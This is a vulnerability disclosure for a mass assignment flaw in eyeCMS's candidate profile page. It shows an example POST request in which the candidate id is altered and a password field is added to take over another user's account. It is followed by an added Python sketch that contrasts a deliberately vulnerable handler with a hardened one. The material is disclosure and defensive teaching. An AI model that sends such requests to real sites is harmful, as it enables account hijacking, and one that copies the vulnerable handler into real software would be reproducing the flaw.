[Suggested description]
A mass assignment vulnerability in eyecomms eyeCMS through 2019-10-15 allows any
candidate to take over another candidate's account (by also exploiting CVE-2019-17604) via
a modified candidate id and an additional password parameter.
The outcome is that the password of this other candidate is changed.
[Vendor of Product]
[Affected Product Code Base]
eyeCMS - unknown version (commercial)
[Affected Component]
careers page
[CVE Impact Other]
Take over other users' accounts
[Attack Vectors]
To exploit the vulnerability, the attacker should register as a candidate.
POST /candidates/profile HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNpWnwAzZI1eCzzi6
Cookie: XSRF-TOKEN=RBKoyftI3JftAA1TvxuSWI3JftAA1TvxuSWyKOSDwzkiYE9wSt; laravel_session=S1evI3JftAA1TvxuSWyKOSDwzkiYoIGBX4YUfjC7dDHKV;
Content-Disposition: form-data; name="_token"
Content-Disposition: form-data; name="id"
4456 <-- change this to any other user id
Content-Disposition: form-data; name="password" <-- Add this parameter
Content-Disposition: form-data; name="first_name"
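
[Added example: server-side fix pattern]
The sketch below is an added, framework-agnostic illustration, not eyeCMS code or part of the original report: it models a profile handler that trusts the form's id and binds every field, beside a hardened one that takes the record from the session and binds only allow-listed fields. Handler names, the field list, candidate 4455 and the stored values are assumptions constructed for the example.

```python
# Added example: hypothetical handler names, constructed in-memory data.
EDITABLE_FIELDS = {"first_name", "last_name", "phone"}  # assumed allow-list
IGNORED_FIELDS = {"_token", "id"}  # CSRF token and the id echoed by the form


def fresh_store():
    """Constructed sample records: candidate id -> stored columns."""
    return {
        4455: {"first_name": "Alice", "password": "hash-a"},
        4456: {"first_name": "Bob", "password": "hash-b"},
    }


class RejectedUpdate(Exception):
    """Raised when a profile form carries a foreign id or an unlisted field."""


def update_profile_vulnerable(store, session_candidate_id, form):
    # Flawed pattern: the record is selected by the client-supplied "id"
    # and every other submitted field is copied onto it.
    target = int(form.get("id", session_candidate_id))
    for field, value in form.items():
        if field not in IGNORED_FIELDS:
            store[target][field] = value
    return target


def update_profile_hardened(store, session_candidate_id, form):
    # 1. The record comes from the authenticated session only; a differing
    #    form "id" is refused (and is worth logging as tampering).
    if "id" in form and str(form["id"]) != str(session_candidate_id):
        raise RejectedUpdate("form id does not match session candidate")
    # 2. Only allow-listed columns are bound; "password" is not among them.
    unexpected = set(form) - EDITABLE_FIELDS - IGNORED_FIELDS
    if unexpected:
        raise RejectedUpdate("unexpected fields: " + ", ".join(sorted(unexpected)))
    for field in EDITABLE_FIELDS & set(form):
        store[session_candidate_id][field] = form[field]
    return session_candidate_id
```

Rejecting the request instead of silently dropping the extra fields gives the application a clear event to log and alert on.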